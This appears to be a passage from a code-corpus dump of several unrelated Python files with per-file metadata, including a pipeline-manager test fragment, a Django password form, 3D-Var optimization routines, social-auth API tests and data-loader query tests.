iv_class = pipeline_manager.get(iv)
str_class = pipeline_manager.get('stuff.ExampleClass')
for obj in [iv, iv_run, iv_class, str_class]:
sp = obj._section_path_str
assert sp == 'test_pipeline_manager.stuff.ExampleClass'
def test_get_class_section_path_by_section(self):
self.write_example_class_to_pipeline_dict_file()
pipeline_manager = self.create_pm()
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.stuff
iv_class = pipeline_manager.get(iv)
str_class = pipeline_manager.get('stuff')
assert iv._section_path_str == 'test_pipeline_manager.stuff'
for obj_list in [iv_class, str_class]:
for obj in obj_list:
sp = obj._section_path_str
assert sp == 'test_pipeline_manager.stuff.ExampleClass'
def test_get_specific_class_section_path(self):
self.write_example_class_dict_to_file()
ccdl = deepcopy(CLASS_CONFIG_DICT_LIST)
for config_dict in ccdl:
config_dict['execute_attr'] = 'return_section_path_str'
pipeline_manager = self.create_pm(
specific_class_config_dicts=ccdl
)
pipeline_manager.load()
sel = Selector()
assert sel.test_pipeline_manager.example_class.stuff.data.return_section_path_str() == \
'test_pipeline_manager.example_class.stuff.data'
iv = sel.test_pipeline_manager.example_class.stuff.data
        # result of __call__ on ExampleClass: the result should not have
        # _section_path_str, but the object itself should
iv_run = iv()
pm_run = pipeline_manager.run(iv)
assert not hasattr(iv_run, '_section_path_str')
assert iv_run == pm_run == 'test_pipeline_manager.example_class.stuff.data'
# attribute access should be normal, not have _section_path_str
iv_attr = iv.a
assert not hasattr(iv_attr, '_section_path_str')
assert iv_attr is None
# property access should be normal, not have _section_path_str
iv_property = iv.my_property
assert not hasattr(iv_property, '_section_path_str')
assert iv_property == 100
iv_obj = pipeline_manager.get(iv)
str_obj = pipeline_manager.get('example_class.stuff.data')
for obj in [iv, iv_obj, str_obj]:
sp = obj._section_path_str
assert sp == 'test_pipeline_manager.example_class.stuff.data'
def test_get_specific_class_section_path_by_section(self):
self.write_example_class_dict_to_file()
pipeline_manager = self.create_pm(
specific_class_config_dicts=CLASS_CONFIG_DICT_LIST
)
pipeline_manager.load()
sel = Selector()
iv = sel.test_pipeline_manager.example_class.stuff
iv_obj = pipeline_manager.get(iv)
str_obj = pipeline_manager.get('example_class.stuff')
assert iv._section_path_str == 'test_pipeline_manager.example_class.stuff'
for obj_list in [iv_obj, str_obj]:
for obj in obj_list:
sp = obj._section_path_str
assert sp == 'test_pipeline_manager.example_class.stuff.data' | 42.548193 | 116 | 0.674029 | 2,831 | 21,189 | 4.636877 | 0.039915 | 0.179401 | 0.072675 | 0.038851 | 0.920545 | 0.894949 | 0.880018 | 0.865925 | 0.840786 | 0.814581 | 0 | 0.004177 | 0.243051 | 21,189 | 498 | 117 | 42.548193 | 0.814265 | 0.031054 | 0 | 0.740406 | 0 | 0 | 0.063755 | 0.034022 | 0 | 0 | 0 | 0 | 0.139955 | 1 | 0.056433 | false | 0 | 0.009029 | 0 | 0.072235 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
67be7c0304e326407cc64db173e0aa929cd4d2ad | 377 | py | Python | scielomanager/accounts/forms.py | jamilatta/scielo-manager | d506c6828ba9b1089faa164bc42ba29a0f228e61 | [
"BSD-2-Clause"
] | null | null | null | scielomanager/accounts/forms.py | jamilatta/scielo-manager | d506c6828ba9b1089faa164bc42ba29a0f228e61 | [
"BSD-2-Clause"
] | null | null | null | scielomanager/accounts/forms.py | jamilatta/scielo-manager | d506c6828ba9b1089faa164bc42ba29a0f228e61 | [
"BSD-2-Clause"
] | null | null | null | # coding: utf-8
from django import forms
class PasswordChangeForm(forms.Form):
password = forms.CharField(
widget=forms.PasswordInput(attrs={'class': 'span3'}))
new_password = forms.CharField(
widget=forms.PasswordInput(attrs={'class': 'span3'}))
new_password_again = forms.CharField(
widget=forms.PasswordInput(attrs={'class': 'span3'}))
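
    # A clean() one might add to enforce matching new passwords
    # (an illustrative sketch only; not part of the original form):
    #
    #   def clean(self):
    #       cleaned = super(PasswordChangeForm, self).clean()
    #       if cleaned.get('new_password') != cleaned.get('new_password_again'):
    #           raise forms.ValidationError('New passwords do not match.')
    #       return cleaned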
| 31.416667 | 61 | 0.689655 | 41 | 377 | 6.268293 | 0.439024 | 0.163424 | 0.233463 | 0.291829 | 0.735409 | 0.735409 | 0.735409 | 0.735409 | 0.529183 | 0.529183 | 0 | 0.012698 | 0.164456 | 377 | 11 | 62 | 34.272727 | 0.803175 | 0.034483 | 0 | 0.375 | 0 | 0 | 0.082873 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.875 | 0.125 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
67e034d7b0c40ddccb0edc2dc9ac285e58b50511 | 17,440 | py | Python | src/atmos_flux_inversion/variational.py | DWesl/atmospheric-inverse-methods-for-flux-optimization | f8a3e8564dc3bf86df297a0683a2a52c657289d4 | [
"BSD-3-Clause"
] | 4 | 2020-04-20T20:14:27.000Z | 2022-02-28T16:49:58.000Z | src/atmos_flux_inversion/variational.py | DWesl/atmospheric-inverse-methods-for-flux-optimization | f8a3e8564dc3bf86df297a0683a2a52c657289d4 | [
"BSD-3-Clause"
] | 6 | 2019-03-06T02:03:44.000Z | 2020-08-04T17:07:12.000Z | src/atmos_flux_inversion/variational.py | DWesl/atmospheric-inverse-methods-for-flux-optimization | f8a3e8564dc3bf86df297a0683a2a52c657289d4 | [
"BSD-3-Clause"
] | 1 | 2019-01-31T12:57:29.000Z | 2019-01-31T12:57:29.000Z | """Functions implementing 3D-Var.
Signatures follow the functions in
:mod:`atmos_flux_inversion.optimal_interpolation`
Note
----
Forces in-memory computations. BFGS method requires this, and there
are odd shape-mismatch errors if I just change to dask arrays.
Conjugate gradient solvers may work better for dask arrays if we drop
the covariance matrix from the return values.
"""
import scipy.optimize
import scipy.linalg
# I believe scipy's minimizer requires things that give boolean true
# or false from the objective, rather than a yet-to-be-realized dask
# array.
from numpy import asarray
from numpy import zeros_like
from atmos_flux_inversion import ConvergenceError, MAX_ITERATIONS, GRAD_TOL
from atmos_flux_inversion.util import solve, method_common
@method_common
def simple(background, background_covariance,
observations, observation_covariance,
observation_operator,
reduced_background_covariance=None,
reduced_observation_operator=None):
"""Feed everything to scipy's minimizer.
Assumes everything follows a multivariate normal distribution
with the specified covariance matrices. Under this assumption
`analysis_covariance` is exact, and `analysis` is the Maximum
Likelihood Estimator and the Best Linear Unbiased Estimator
for the underlying state in the frequentist framework, and
specify the posterior distribution for the state in the
Bayesian framework. If these are not satisfied, these still
form the Generalized Least Squares estimates for the state and
an estimated uncertainty.
Parameters
----------
background: array_like[N]
The background state estimate.
background_covariance: array_like[N, N]
Covariance of background state estimate across
realizations/ensemble members. "Ensemble" is here
interpreted in the sense used in statistical mechanics or
frequentist statistics, and may not be derived from a
sample as in meteorological ensemble Kalman filters
observations: array_like[M]
The observations constraining the background estimate.
observation_covariance: array_like[M, M]
Covariance of observations across realizations/ensemble
members. "Ensemble" again has the statistical meaning.
observation_operator: array_like[M, N]
The relationship between the state and the observations.
reduced_background_covariance: array_like[Nred, Nred], optional
The covariance for a smaller state space, usually obtained by
reducing resolution in space and time. Note that
`reduced_observation_operator` must also be provided
reduced_observation_operator: array_like[M, Nred], optional
The relationship between the reduced state space and the
observations. Note that `reduced_background_covariance`
must also be provided.
Returns
-------
analysis: array_like[N]
Analysis state estimate
analysis_covariance: array_like[Nred, Nred] or array_like[N, N]
Estimated uncertainty of analysis across
realizations/ensemble members. Calculated using
reduced_background_covariance and
reduced_observation_operator if possible
Raises
------
ConvergenceError
If iterative solver does not converge
Notes
-----
minimizes
.. math::
(x - x_0)^T P_B^{-1} (x - x_0) + (y - h(x))^T R^{-1} (y - h(x))
which has gradient
.. math::
        P_B^{-1} (x - x_0) - H^T R^{-1} (y - h(x))
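
    Examples
    --------
    A minimal sketch with tiny toy arrays (the values below are
    illustrative assumptions, not drawn from any real problem)::

        import numpy as np
        background = np.array([1.0, 2.0])
        background_covariance = np.eye(2)
        observations = np.array([3.0])
        observation_covariance = np.eye(1)
        observation_operator = np.array([[1.0, 1.0]])
        analysis, analysis_covariance = simple(
            background, background_covariance,
            observations, observation_covariance,
            observation_operator)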
"""
def cost_function(test_state):
"""Mismatch between state, prior, and obs.
Parameters
----------
test_state: np.ndarray[N]
Returns
-------
float
A measure of the mismatch between the test state and the
background and observations
"""
prior_mismatch = asarray(test_state - background)
test_obs = observation_operator.dot(test_state)
obs_mismatch = asarray(test_obs - observations)
prior_fit = prior_mismatch.dot(solve(
background_covariance, prior_mismatch))
obs_fit = obs_mismatch.dot(solve(
observation_covariance, obs_mismatch))
return prior_fit + obs_fit
def cost_jacobian(test_state):
"""Gradiant of cost_function at `test_state`.
Parameters
----------
test_state: np.ndarray[N]
Returns
-------
jac: np.ndarray[N]
"""
prior_mismatch = test_state - background
test_obs = observation_operator.dot(test_state)
obs_mismatch = test_obs - observations
prior_gradient = solve(background_covariance,
prior_mismatch)
obs_gradient = observation_operator.T.dot(
solve(observation_covariance,
obs_mismatch))
return prior_gradient + obs_gradient
# def cost_hessian_product(test_state, test_step):
# """Hessian of cost_function at `test_state` times `test_step`.
# Parameters
# ----------
# test_state: np.ndarray[N]
# test_step: np.ndarray[N]
    # Returns
# -------
# hess_prod: np.ndarray[N]
# """
# bg_prod = solve(background_covariance,
# test_step)
# obs_prod = observation_operator.T.dot(
# solve(observation_covariance,
# observation_operator.dot(test_step)))
# return bg_prod + obs_prod
if reduced_background_covariance is None:
method = "BFGS"
else:
method = "Newton-CG"
result = scipy.optimize.minimize(
cost_function, background,
method=method,
jac=cost_jacobian,
# hessp=cost_hessian_product,
options=dict(maxiter=MAX_ITERATIONS,
gtol=GRAD_TOL),
)
if not result.success:
raise ConvergenceError("Did not converge: {msg:s}".format(
msg=result.message), result)
if reduced_background_covariance is not None:
result.hess_inv = None
return result.x, result.hess_inv
@method_common
def incremental(background, background_covariance,
observations, observation_covariance,
observation_operator,
reduced_background_covariance=None,
reduced_observation_operator=None):
"""Feed everything to scipy's minimizer.
Use the change from the background to try to avoid precision loss.
Assumes everything follows a multivariate normal distribution
with the specified covariance matrices. Under this assumption
`analysis_covariance` is exact, and `analysis` is the Maximum
Likelihood Estimator and the Best Linear Unbiased Estimator
for the underlying state in the frequentist framework, and
specify the posterior distribution for the state in the
Bayesian framework. If these are not satisfied, these still
form the Generalized Least Squares estimates for the state and
an estimated uncertainty.
Parameters
----------
background: array_like[N]
The background state estimate.
background_covariance: array_like[N, N]
Covariance of background state estimate across
realizations/ensemble members. "Ensemble" is here
interpreted in the sense used in statistical mechanics or
frequentist statistics, and may not be derived from a
sample as in meteorological ensemble Kalman filters
observations: array_like[M]
The observations constraining the background estimate.
observation_covariance: array_like[M, M]
Covariance of observations across realizations/ensemble
members. "Ensemble" again has the statistical meaning.
observation_operator: array_like[M, N]
The relationship between the state and the observations.
reduced_background_covariance: array_like[Nred, Nred], optional
The covariance for a smaller state space, usually obtained by
reducing resolution in space and time. Note that
`reduced_observation_operator` must also be provided
reduced_observation_operator: array_like[M, Nred], optional
The relationship between the reduced state space and the
observations. Note that `reduced_background_covariance`
must also be provided.
Returns
-------
analysis: array_like[N]
Analysis state estimate
analysis_covariance: array_like[Nred, Nred] or array_like[N, N]
Estimated uncertainty of analysis across
realizations/ensemble members. Calculated using
reduced_background_covariance and
reduced_observation_operator if possible
Raises
------
ConvergenceError
If iterative solver does not converge
Notes
-----
minimizes
.. math::
(dx)^T P_B^{-1} (dx) + (y - h(x_0) - H dx)^T R^{-1} (y - h(x_0) - H dx)
which has gradient
.. math::
        P_B^{-1} (dx) - H^T R^{-1} (y - h(x_0) - H dx)
where :math:`x = x_0 + dx`
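
    Examples
    --------
    The call signature matches :func:`simple`; the difference is that
    the optimizer iterates on the increment ``dx`` rather than the full
    state, which can reduce round-off error when ``background`` has
    large magnitude.  A hedged sketch, reusing the toy arrays from the
    :func:`simple` example::

        analysis, analysis_covariance = incremental(
            background, background_covariance,
            observations, observation_covariance,
            observation_operator)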
"""
innovations = observations - observation_operator.dot(background)
def cost_function(test_change):
"""Mismatch between state, prior, and obs.
Parameters
----------
        test_change: np.ndarray[N]
Returns
-------
cost: float
"""
obs_change = observation_operator.dot(test_change)
obs_mismatch = innovations - obs_change
prior_fit = test_change.dot(asarray(solve(
background_covariance, test_change)))
obs_fit = obs_mismatch.dot(asarray(solve(
observation_covariance, obs_mismatch)))
return prior_fit + obs_fit
def cost_jacobian(test_change):
"""Gradiant of cost_function at `test_change`.
Parameters
----------
        test_change: np.ndarray[N]
Returns
-------
jac: np.ndarray[N]
"""
obs_change = observation_operator.dot(test_change)
obs_mismatch = innovations - obs_change
prior_gradient = solve(background_covariance,
test_change)
obs_gradient = observation_operator.T.dot(
solve(observation_covariance,
obs_mismatch))
return prior_gradient - obs_gradient
# def cost_hessian_product(test_state, test_step):
# """Hessian of cost_function at `test_state` times `test_step`.
# Parameters
# ----------
# test_state: np.ndarray[N]
# test_step: np.ndarray[N]
    # Returns
# -------
# hess_prod: np.ndarray[N]
# """
# bg_prod = solve(background_covariance,
# test_step)
# obs_prod = observation_operator.T.dot(
# solve(observation_covariance,
# observation_operator.dot(test_step)))
# return bg_prod + obs_prod
if reduced_background_covariance is None:
method = "BFGS"
else:
method = "Newton-CG"
result = scipy.optimize.minimize(
cost_function, asarray(zeros_like(background)),
method=method,
jac=cost_jacobian,
# hessp=cost_hessian_product,
options=dict(maxiter=MAX_ITERATIONS,
gtol=GRAD_TOL),
)
analysis = background + result.x
if not result.success:
raise ConvergenceError("Did not converge: {msg:s}".format(
msg=result.message), result, analysis)
if reduced_background_covariance is not None:
result.hess_inv = None
return analysis, result.hess_inv
@method_common
def incr_chol(background, background_covariance,
observations, observation_covariance,
observation_operator,
reduced_background_covariance=None,
reduced_observation_operator=None):
"""Feed everything to scipy's minimizer.
Use the change from the background to try to avoid precision loss.
Also use Cholesky factorization of the covariances to speed
solution of matrix equations.
Assumes everything follows a multivariate normal distribution
with the specified covariance matrices. Under this assumption
`analysis_covariance` is exact, and `analysis` is the Maximum
Likelihood Estimator and the Best Linear Unbiased Estimator
for the underlying state in the frequentist framework, and
specify the posterior distribution for the state in the
Bayesian framework. If these are not satisfied, these still
form the Generalized Least Squares estimates for the state and
an estimated uncertainty.
Parameters
----------
background: array_like[N]
The background state estimate.
background_covariance: array_like[N, N]
Covariance of background state estimate across
realizations/ensemble members. "Ensemble" is here
interpreted in the sense used in statistical mechanics or
frequentist statistics, and may not be derived from a
sample as in meteorological ensemble Kalman filters
observations: array_like[M]
The observations constraining the background estimate.
observation_covariance: array_like[M, M]
Covariance of observations across realizations/ensemble
members. "Ensemble" again has the statistical meaning.
observation_operator: array_like[M, N]
The relationship between the state and the observations.
reduced_background_covariance: array_like[Nred, Nred], optional
The covariance for a smaller state space, usually obtained by
reducing resolution in space and time. Note that
`reduced_observation_operator` must also be provided
reduced_observation_operator: array_like[M, Nred], optional
The relationship between the reduced state space and the
observations. Note that `reduced_background_covariance`
must also be provided.
Returns
-------
analysis: array_like[N]
Analysis state estimate
analysis_covariance: array_like[Nred, Nred] or array_like[N, N]
Estimated uncertainty of analysis across
realizations/ensemble members. Calculated using
reduced_background_covariance and
reduced_observation_operator if possible
Raises
------
ConvergenceError
If iterative solver does not converge
Notes
-----
minimizes
.. math::
(dx)^T P_B^{-1} (dx) + (y - h(x_0) - H dx)^T R^{-1} (y - h(x_0) - H dx)
which has gradient
.. math::
        P_B^{-1} (dx) - H^T R^{-1} (y - h(x_0) - H dx)
where :math:`x = x_0 + dx`
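
    Examples
    --------
    The call signature matches :func:`incremental`; internally each
    covariance matrix is Cholesky-factored once so that the repeated
    solves inside the optimizer can reuse the factors.  A hedged
    sketch, reusing the toy arrays from the :func:`simple` example::

        analysis, analysis_covariance = incr_chol(
            background, background_covariance,
            observations, observation_covariance,
            observation_operator)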
"""
innovations = observations - observation_operator.dot(background)
from scipy.linalg import cho_factor, cho_solve
# factor the covariances to make the matrix inversions faster
bg_cov_chol_u = cho_factor(background_covariance)
obs_cov_chol_u = cho_factor(observation_covariance)
def cost_function(test_change):
"""Mismatch between state, prior, and obs.
Parameters
----------
        test_change: np.ndarray[N]
Returns
-------
cost: float
"""
obs_change = observation_operator.dot(test_change)
obs_mismatch = innovations - obs_change
prior_fit = test_change.dot(cho_solve(
bg_cov_chol_u, test_change))
obs_fit = obs_mismatch.dot(cho_solve(
obs_cov_chol_u, obs_mismatch))
return prior_fit + obs_fit
def cost_jacobian(test_change):
"""Gradiant of cost_function at `test_change`.
Parameters
----------
        test_change: np.ndarray[N]
Returns
-------
jac: np.ndarray[N]
"""
obs_change = observation_operator.dot(test_change)
obs_mismatch = innovations - obs_change
prior_gradient = cho_solve(bg_cov_chol_u,
test_change)
obs_gradient = observation_operator.T.dot(
cho_solve(obs_cov_chol_u,
obs_mismatch))
return prior_gradient - obs_gradient
# def cost_hessian_product(test_state, test_step):
# """Hessian of cost_function at `test_state` times `test_step`.
# Parameters
# ----------
# test_state: np.ndarray[N]
# test_step: np.ndarray[N]
    # Returns
# -------
# hess_prod: np.ndarray[N]
# """
# bg_prod = solve(background_covariance,
# test_step)
# obs_prod = observation_operator.T.dot(
# solve(observation_covariance,
# observation_operator.dot(test_step)))
# return bg_prod + obs_prod
if reduced_background_covariance is None:
method = "BFGS"
else:
method = "Newton-CG"
result = scipy.optimize.minimize(
cost_function, asarray(zeros_like(background)),
method=method,
jac=cost_jacobian,
# hessp=cost_hessian_product,
options=dict(maxiter=MAX_ITERATIONS,
gtol=GRAD_TOL),
)
analysis = background + result.x
if not result.success:
raise ConvergenceError("Did not converge: {msg:s}".format(
msg=result.message), result, analysis)
if reduced_background_covariance is not None:
result.hess_inv = None
return analysis, result.hess_inv
| 33.34608 | 79 | 0.652523 | 2,017 | 17,440 | 5.458106 | 0.128409 | 0.060405 | 0.044146 | 0.026978 | 0.900263 | 0.894723 | 0.874739 | 0.868017 | 0.864293 | 0.858661 | 0 | 0.001731 | 0.271216 | 17,440 | 522 | 80 | 33.409962 | 0.864437 | 0.590367 | 0 | 0.703704 | 0 | 0 | 0.019064 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.051852 | 0 | 0.185185 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c022443696d2f9a1e3ad8c2f64c7916461534f79 | 264 | py | Python | syft/serde/protobuf/__init__.py | linamnt/PySyft | 4b60a86c003acbe1967d6c3d611df3d5f2d377ee | [
"Apache-2.0"
] | 2 | 2020-12-30T11:21:43.000Z | 2021-12-04T16:25:53.000Z | syft/serde/protobuf/__init__.py | linamnt/PySyft | 4b60a86c003acbe1967d6c3d611df3d5f2d377ee | [
"Apache-2.0"
] | 2 | 2020-03-09T09:17:06.000Z | 2020-04-09T13:33:12.000Z | syft/serde/protobuf/__init__.py | linamnt/PySyft | 4b60a86c003acbe1967d6c3d611df3d5f2d377ee | [
"Apache-2.0"
] | 1 | 2022-03-06T06:22:21.000Z | 2022-03-06T06:22:21.000Z | from syft.serde.protobuf import proto
from syft.serde.protobuf import serde
from syft.serde.protobuf import native_serde
from syft.serde.protobuf import torch_serde
from syft.serde.protobuf.serde import serialize
from syft.serde.protobuf.serde import deserialize
| 33 | 49 | 0.852273 | 40 | 264 | 5.575 | 0.25 | 0.215247 | 0.349776 | 0.565022 | 0.838565 | 0.573991 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094697 | 264 | 7 | 50 | 37.714286 | 0.933054 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
c024479fad6845ad3554ebb9a0953ca3e3a63aa8 | 1,572 | py | Python | authors/apps/authentication/tests/test_social_auth.py | andela/ah-backend-tesseract | ed3c932cdfa2661662100bb50727f5239d1a6d14 | [
"BSD-3-Clause"
] | null | null | null | authors/apps/authentication/tests/test_social_auth.py | andela/ah-backend-tesseract | ed3c932cdfa2661662100bb50727f5239d1a6d14 | [
"BSD-3-Clause"
] | 56 | 2018-08-28T13:18:19.000Z | 2021-06-10T20:49:30.000Z | authors/apps/authentication/tests/test_social_auth.py | andela/ah-backend-tesseract | ed3c932cdfa2661662100bb50727f5239d1a6d14 | [
"BSD-3-Clause"
] | 4 | 2018-08-24T04:40:32.000Z | 2021-06-30T09:47:08.000Z | from rest_framework import status
from authors.apps.authentication.tests import BaseTest
class SocialAuthenticationTests(BaseTest):
def test_google_invalid_login(self):
response = self.client.post("/api/social/", self.google_invalid_login, format="json")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_invalid_provider_login(self):
response = self.client.post("/api/social/", self.invalid_provider, format="json")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_facebook_login(self):
response = self.client.post("/api/social/", self.facebook_login, format="json")
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_facebook_invalid_login(self):
response = self.client.post("/api/social/", self.facebook_invalid_login, format="json")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_twitter_login(self):
response = self.client.post("/api/social/", self.twitter_login, format="json")
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_invalid_twitter_login(self):
response = self.client.post("/api/social/", self.twitter_invalid_login, format="json")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_twitter_no_secret(self):
response = self.client.post("/api/social/", self.twitter_no_secret, format="json")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
| 46.235294 | 95 | 0.743639 | 204 | 1,572 | 5.45098 | 0.186275 | 0.044065 | 0.100719 | 0.138489 | 0.817446 | 0.817446 | 0.817446 | 0.817446 | 0.817446 | 0.736511 | 0 | 0.015556 | 0.141221 | 1,572 | 33 | 96 | 47.636364 | 0.808148 | 0 | 0 | 0.291667 | 0 | 0 | 0.071247 | 0 | 0 | 0 | 0 | 0 | 0.291667 | 1 | 0.291667 | false | 0 | 0.083333 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c05ca69200f3f546ed27e985f347f36312a620cb | 6,442 | py | Python | tests/test_data_loader.py | eltociear/chaos_genius | eb3bc27181c8af4144b95e685386814109173164 | [
"MIT"
] | 1 | 2022-02-25T16:11:34.000Z | 2022-02-25T16:11:34.000Z | tests/test_data_loader.py | eltociear/chaos_genius | eb3bc27181c8af4144b95e685386814109173164 | [
"MIT"
] | null | null | null | tests/test_data_loader.py | eltociear/chaos_genius | eb3bc27181c8af4144b95e685386814109173164 | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from datetime import date, timedelta
import re
from _pytest.monkeypatch import MonkeyPatch
from chaos_genius.core.utils.data_loader import DataLoader
from chaos_genius.databases.models.data_source_model import DataSource
def test_data_loader(monkeypatch: MonkeyPatch):
# TODO: Add filters for testing
kpi_info = {
"datetime_column": "date",
"id": 1,
"kpi_query": "",
"kpi_type": "table",
"metric": "cloud_cost",
"table_name": "cloud_cost",
"data_source": {},
"filters": "",
}
data_source = {
"connection_type": "Postgres",
"id": 1
}
@dataclass
class TestDataSource:
as_dict: dict
def get_data_source(*args, **kwargs):
return TestDataSource(data_source)
monkeypatch.setattr(DataSource, "get_by_id", get_data_source)
# table, end_date, start_date
end_date = date(2020, 1, 1)
start_date = date(2019, 1, 1)
dl = DataLoader(
kpi_info,
end_date=end_date,
start_date=start_date
)
end_date = end_date + timedelta(days=1)
output_query = f"""select * from "cloud_cost" where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}'"""
assert output_query == dl._build_query().strip()
# table, end_date, start_date, count
output_query = f"""select count(*) from "cloud_cost" where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}'"""
assert output_query == dl._build_query(count=True).strip()
# table, end_date, start_date, tail
dl = DataLoader(
kpi_info,
end_date=end_date,
start_date=start_date,
tail=10
)
end_date = end_date + timedelta(days=1)
output_query = f"""select * from "cloud_cost" where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}' limit 10"""
assert output_query == dl._build_query().strip()
# table, end_date, days_before
end_date = date(2020, 1, 1)
days_before = 30
start_date = end_date - timedelta(days=days_before)
dl = DataLoader(
kpi_info,
end_date=end_date,
days_before=days_before
)
end_date = end_date + timedelta(days=1)
output_query = f"""select * from "cloud_cost" where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}'"""
assert output_query == dl._build_query().strip()
# table, end_date, days_before, count
output_query = f"""select count(*) from "cloud_cost" where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}'"""
assert output_query == dl._build_query(count=True).strip()
# table, end_date, days_before, tail
end_date = date(2020, 1, 1)
dl = DataLoader(
kpi_info,
end_date=end_date,
days_before=days_before,
tail=10
)
end_date = end_date + timedelta(days=1)
output_query = f"""select * from "cloud_cost" where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}' limit 10"""
assert output_query == dl._build_query().strip()
kpi_info = {
"datetime_column": "date",
"id": 1,
"kpi_query": "select * from cloud_cost",
"kpi_type": "query",
"metric": "cloud_cost",
"data_source": {},
"filters": "",
}
# query, end_date, start_date
end_date = date(2020, 1, 1)
start_date = date(2019, 1, 1)
dl = DataLoader(
kpi_info,
end_date=end_date,
start_date=start_date
)
end_date = end_date + timedelta(days=1)
output_query = r"select \* from \(select \* from cloud_cost\) as \"[a-z]{10}\""\
+ f""" where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}'"""
assert re.match(output_query, dl._build_query().strip())
# query, end_date, start_date, count
output_query = r"select count\(\*\) from \(select \* from cloud_cost\) as \"[a-z]{10}\""\
+ f""" where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}'"""
assert re.match(output_query, dl._build_query(count=True).strip())
# query, end_date, start_date, tail
end_date = date(2020, 1, 1)
dl = DataLoader(
kpi_info,
end_date=end_date,
start_date=start_date,
tail=10
)
end_date = end_date + timedelta(days=1)
# output_query = f"""select * from (select * from cloud_cost) where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}' limit 10"""
# assert output_query == dl._build_query().strip()
output_query = r"select \* from \(select \* from cloud_cost\) as \"[a-z]{10}\""\
+ f""" where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}' limit 10"""
assert re.match(output_query, dl._build_query().strip())
# query, end_date, days_before
end_date = date(2020, 1, 1)
days_before = 30
start_date = end_date - timedelta(days=days_before)
dl = DataLoader(
kpi_info,
end_date=end_date,
days_before=days_before
)
end_date = end_date + timedelta(days=1)
output_query = r"select \* from \(select \* from cloud_cost\) as \"[a-z]{10}\""\
+ f""" where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}'"""
assert re.match(output_query, dl._build_query().strip())
# query, end_date, days_before, count
output_query = r"select count\(\*\) from \(select \* from cloud_cost\) as \"[a-z]{10}\""\
+ f""" where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}'"""
assert re.match(output_query, dl._build_query(count=True).strip())
# query, end_date, days_before, tail
end_date = date(2020, 1, 1)
dl = DataLoader(
kpi_info,
end_date=end_date,
days_before=days_before,
tail=10
)
end_date = end_date + timedelta(days=1)
output_query = r"select \* from \(select \* from cloud_cost\) as \"[a-z]{10}\""\
+ f""" where "date" >= '{start_date.strftime("%Y-%m-%d")}' and "date" < '{end_date.strftime("%Y-%m-%d")}' limit 10"""
assert re.match(output_query, dl._build_query().strip())
